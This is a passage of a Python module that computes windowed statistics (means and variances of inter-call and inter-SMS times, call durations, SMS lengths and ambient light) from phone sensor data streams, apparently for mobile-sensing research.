for each hour window. If there is not enough data for a window then
there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:param List(DataPoint) smsdata: SMS DataStream
:return: Average inter-phone call and sms time over 1 hour windows
:rtype: List(DataPoint) or None
"""
tmpphonestream = self.get_filtered_data(phonedata)
tmpsmsstream = self.get_filtered_data(smsdata)
if len(tmpphonestream) + len(tmpsmsstream) <= 1:
return None
for s in tmpphonestream:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
for s in tmpsmsstream:
s.end_time = s.start_time
combined_data = phonedata + smsdata
combined_data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
return new_data
def average_inter_phone_call_sms_time_four_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint]) \
-> List[DataPoint]:
"""
Average time (in minutes) between two consecutive events (call and sms)
for each four hour window. If there is not enough data for a window then
there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:param List(DataPoint) smsdata: SMS DataStream
:return: Average inter-phone call and sms time over 4 hour windows
:rtype: List(DataPoint) or None
"""
tmpphonestream = self.get_filtered_data(phonedata)
tmpsmsstream = self.get_filtered_data(smsdata)
if len(tmpphonestream) + len(tmpsmsstream) <= 1:
return None
for s in tmpphonestream:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
for s in tmpsmsstream:
s.end_time = s.start_time
combined_data = phonedata + smsdata
combined_data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
return new_data
def average_inter_phone_call_sms_time_daily(self, phonedata: List[DataPoint], smsdata: List[DataPoint])\
-> List[DataPoint]:
"""
Average time (in minutes) between two consecutive events (call and sms)
for whole day. If there is not enough data then it will return None.
:param List(DataPoint) phonedata: Phone call DataStream
:param List(DataPoint) smsdata: SMS DataStream
:return: Average inter-phone call and sms time over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) + len(smsdata) <= 1:
return None
tmpphonestream = phonedata
tmpsmsstream = smsdata
for s in tmpphonestream:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
for s in tmpsmsstream:
s.end_time = s.start_time
combined_data = phonedata + smsdata
combined_data.sort(key=lambda x: x.start_time)
start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(combined_data)) / (len(combined_data) - 1))]
return new_data
def variance_inter_phone_call_sms_time_daily(self, phonedata: List[DataPoint], smsdata: List[DataPoint]) \
-> List[DataPoint]:
"""
Variance of time (in minutes) between two consecutive events (call and sms)
for whole day. If there is not enough data then it will return None.
:param List(DataPoint) phonedata: Phone call DataStream
:param List(DataPoint) smsdata: SMS DataStream
:return: Variance of inter-phone call and sms time over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) + len(smsdata) <= 1:
return None
tmpphonestream = phonedata
tmpsmsstream = smsdata
for s in tmpphonestream:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
for s in tmpsmsstream:
s.end_time = s.start_time
combined_data = phonedata + smsdata
combined_data.sort(key=lambda x: x.start_time)
start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(combined_data)))]
return new_data
def variance_inter_phone_call_sms_time_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint])\
->List[DataPoint]:
"""
Variance of time (in minutes) between two consecutive events (call and sms)
for each hour window. If there is not enough data for a window then
there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:param List(DataPoint) smsdata: SMS DataStream
:return: Variances of inter-phone call and sms time over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) + len(smsdata) <= 1:
return None
tmpphonestream = phonedata
tmpsmsstream = smsdata
for s in tmpphonestream:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
for s in tmpsmsstream:
s.end_time = s.start_time
combined_data = phonedata + smsdata
combined_data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(datalist))))
return new_data
def variance_inter_phone_call_sms_time_four_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint])\
->List[DataPoint]:
"""
Variance of time (in minutes) between two consecutive events (call and sms)
for each four hour window. If there is not enough data for a window then
there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:param List(DataPoint) smsdata: SMS DataStream
:return: Variances of inter-phone call and sms time over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) + len(smsdata) <= 1:
return None
tmpphonestream = phonedata
tmpsmsstream = smsdata
for s in tmpphonestream:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
for s in tmpsmsstream:
s.end_time = s.start_time
combined_data = phonedata + smsdata
combined_data.sort(key=lambda x: x.start_time)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(datalist))))
return new_data
def average_inter_phone_call_time_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
"""
Average time (in minutes) between two consecutive call for each hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average inter-phone call time over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) <= 1:
return None
combined_data = phonedata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
return new_data
def average_inter_phone_call_time_four_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
"""
Average time (in minutes) between two consecutive call for each four hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average inter-phone call time over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) <= 1:
return None
combined_data = phonedata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
return new_data
def average_inter_phone_call_time_daily(self, phonedata: List[DataPoint])->List[DataPoint]:
"""
Average time (in minutes) between two consecutive call for a whole day.
If there is not enough data for the day then it will return None.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average inter-phone call time over 1 day window
:rtype: List(DataPoint) or None
"""
if len(phonedata) <= 1:
return None
combined_data = phonedata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(combined_data)) / (len(combined_data) - 1))]
return new_data
def variance_inter_phone_call_time_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
"""
Variance of time (in minutes) between two consecutive call for each hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average inter-phone call time over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) <= 1:
return None
combined_data = phonedata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(datalist))))
return new_data
def variance_inter_phone_call_time_four_hourly(self, phonedata: List[DataPoint])->List[DataPoint]:
"""
Variance of time (in minutes) between two consecutive call for each four hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Variance of inter-phone call time over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) <= 1:
return None
combined_data = phonedata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(datalist))))
return new_data
def variance_inter_phone_call_time_daily(self, phonedata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) between two consecutive call for a day.
If there is not enough data for the day then it will return None.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Variance of inter-phone call time over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) <= 1:
return None
combined_data = phonedata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(combined_data)))]
return new_data
def average_inter_sms_time_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) between two consecutive sms for each hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Average inter-sms time over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) <= 1:
return None
combined_data = smsdata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
return new_data
def average_inter_sms_time_four_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) between two consecutive sms for each four hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Average inter-sms time over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) <= 1:
return None
combined_data = smsdata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
return new_data
def average_inter_sms_time_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) between two consecutive sms for a day.
If there is not enough data for the day then it will return None.
:param List(DataPoint) smsdata: SMS DataStream
:return: Average inter-sms time over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) <= 1:
return None
combined_data = smsdata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
sample=sum(self.inter_event_time_list(combined_data)) / (len(combined_data) - 1))]
return new_data
def variance_inter_sms_time_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Variance of time (in minutes) between two consecutive sms for each hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Variance of inter-sms time over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) <= 1:
return None
combined_data = smsdata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(datalist))))
return new_data
def variance_inter_sms_time_four_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) between two consecutive sms for each four hour window.
If there is not enough data for a window then there will be no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Variance of inter-sms time over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) <= 1:
return None
combined_data = smsdata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = copy.deepcopy(combined_data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in combined_data:
if start <= d.start_time <= end or start <= d.end_time <= end:
datalist.append(d)
if len(datalist) <= 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(datalist))))
return new_data
def variance_inter_sms_time_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) between two consecutive sms for a day.
If there is not enough data for that day, then it will return None.
:param List(DataPoint) smsdata: SMS DataStream
:return: Variance of inter-sms time over 1 daily windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) <= 1:
return None
combined_data = smsdata
for s in combined_data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
start_time = datetime.datetime(year=combined_data[0].start_time.year, month=combined_data[0].start_time.month,
day=combined_data[0].start_time.day, tzinfo=combined_data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=combined_data[0].offset,
sample=np.var(self.inter_event_time_list(combined_data)))]
return new_data
def average_call_duration_daily(self, phonedata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) spent in call in a day. If there is not enough data
for that day then it will return None.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average call duration over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) < 1:
return None
data = phonedata
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=sum([d.sample for d in data]) / len(data))]
return new_data
def average_call_duration_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) spent in call for each hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average phone call duration over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) < 1:
return None
data = copy.deepcopy(phonedata)
for s in data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end and start <= d.end_time <= end:
datalist.append(d.sample)
elif start <= d.start_time <= end:
datalist.append((end - d.start_time).total_seconds())
elif start <= d.end_time <= end:
datalist.append((d.start_time - end).total_seconds())
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=sum(datalist) / len(datalist)))
return new_data
def average_call_duration_four_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) spent in call for each four hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average phone call duration over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) < 1:
return None
data = copy.deepcopy(phonedata)
for s in data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end and start <= d.end_time <= end:
datalist.append(d.sample)
elif start <= d.start_time <= end:
datalist.append((end - d.start_time).total_seconds())
elif start <= d.end_time <= end:
datalist.append((d.start_time - end).total_seconds())
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=sum(datalist) / len(datalist)))
return new_data
def average_sms_length_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average sms length for a day. If there is not enough data for that day
then it will return None.
:param List(DataPoint) phonedata: Phone call DataStream
:return: Average sms length over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) < 1:
return None
data = smsdata
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=sum([d.sample for d in data]) / len(data))]
return new_data
def average_sms_length_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average sms length for each hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Average SMS length over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) < 1:
return None
data = smsdata
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=sum(datalist) / len(datalist)))
return new_data
def average_sms_length_four_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average sms length for each four hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Average sms length over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) < 1:
return None
data = smsdata
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=sum(datalist) / len(datalist)))
return new_data
def variance_sms_length_daily(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Variance of sms length for a day. If there is not enough data
for that day, then it will return None.
:param List(DataPoint) smsdata: SMS DataStream
:return: Variance of SMS length over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) < 1:
return None
data = smsdata
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=np.var([d.sample for d in data]))]
return new_data
def variance_sms_length_hourly(self, smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Variance of sms length for each hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Variance of SMS length over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) < 1:
return None
data = smsdata
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.var(datalist)))
return new_data
def variance_sms_length_four_hourly(self, smsdata: List[DataPoint])-> List[DataPoint]:
"""
Variance of sms length for each four hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) smsdata: SMS DataStream
:return: Variance of SMS length over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(smsdata) < 1:
return None
data = smsdata
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end:
datalist.append(d.sample)
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.var(datalist)))
return new_data
def variance_call_duration_daily(self, phonedata: List[DataPoint]) -> List[DataPoint]:
"""
Variance of call duration in minutes for a day. If there is not enough data
for that day then it will return None.
:param List(DataPoint) phonedata: Phone call duration DataStream
:return: Variance of phone call duration over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) < 1:
return None
data = phonedata
start_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=data[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
new_data = [DataPoint(start_time=start_time, end_time=end_time, offset=data[0].offset,
sample=np.var([d.sample for d in data]))]
return new_data
def variance_call_duration_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
"""
Variance of call duration in minutes for each hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) phonedata: Phone call duration DataStream
:return: Variance of phone call duration over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) < 1:
return None
data = copy.deepcopy(phonedata)
for s in data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end and start <= d.end_time <= end:
datalist.append(d.sample)
elif start <= d.start_time <= end:
datalist.append((end - d.start_time).total_seconds())
elif start <= d.end_time <= end:
datalist.append((d.start_time - end).total_seconds())
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.var(datalist)))
return new_data
def variance_call_duration_four_hourly(self, phonedata: List[DataPoint]) -> List[DataPoint]:
"""
Variance of call duration in minutes for each four hour window. If there is not enough data
for any window then there will no data point for that window.
:param List(DataPoint) phonedata: Phone call duration DataStream
:return: Variance of phone call duration over 4 hour windows
:rtype: List(DataPoint) or None
"""
if len(phonedata) < 1:
return None
data = copy.deepcopy(phonedata)
for s in data:
s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
new_data = []
tmp_time = datetime.datetime.combine(data[0].start_time.date(), datetime.datetime.min.time())
tmp_time = tmp_time.replace(tzinfo=data[0].start_time.tzinfo)
for h in range(0, 24, 4):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(hours=3, minutes=59)
for d in data:
if start <= d.start_time <= end and start <= d.end_time <= end:
datalist.append(d.sample)
elif start <= d.start_time <= end:
datalist.append((end - d.start_time).total_seconds())
elif start <= d.end_time <= end:
datalist.append((d.start_time - end).total_seconds())
if len(datalist) < 1:
continue
new_data.append(DataPoint(start_time=start, end_time=end, offset=data[0].offset,
sample=np.var(datalist)))
return new_data
def average_ambient_light_daily(self, lightdata: List[DataPoint], data_frequency: float=16,
minimum_data_percent: float=40) -> List[DataPoint]:
"""
Average ambient light (in flux) for a day. If the input light data is less than minimum_data_percent%
which is default 40%, it will return None.
:param List(DataPoint) lightdata: Phone ambient light DataStream
:param float data_frequency: How many data point should generate in a second
:param float minimum_data_percent: Minimum percent of data should be available
:return: Average of ambient light over 1 day windows
:rtype: List(DataPoint) or None
"""
if len(lightdata) < data_frequency * 24 * 60 * 60 * minimum_data_percent / 100:
return None
start_time = datetime.datetime.combine(lightdata[0].start_time.date(), datetime.datetime.min.time())
start_time = start_time.replace(tzinfo=lightdata[0].start_time.tzinfo)
end_time = start_time + datetime.timedelta(hours=23, minutes=59)
return [DataPoint(start_time, end_time, lightdata[0].offset, np.mean([x.sample for x in lightdata]))]
def average_ambient_light_hourly(self, lightdata: List[DataPoint], data_frequency: float=16,
minimum_data_percent: float=40) -> List[DataPoint]:
"""
Average ambient light (in flux) for each hour window in a day. If the input light data is less than minimum_data_percent%
which is default 40%, in a window then it will not generate any data point for that window.
:param List(DataPoint) lightdata: Phone ambient light DataStream
:param float data_frequency: How many data point should generate in a second
:param float minimum_data_percent: Minimum percent of data should be available
:return: Average of ambient light over 1 hour windows
:rtype: List(DataPoint) or None
"""
if len(lightdata) < 1:
return None
data = lightdata
new_data = []
tmp_time = copy.deepcopy(data[0].start_time)
tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
for h in range(0, 24):
datalist = []
start = tmp_time.replace(hour=h)
end = start + datetime.timedelta(minutes=59)
for d in data:
if start <= d.start_time <= end:
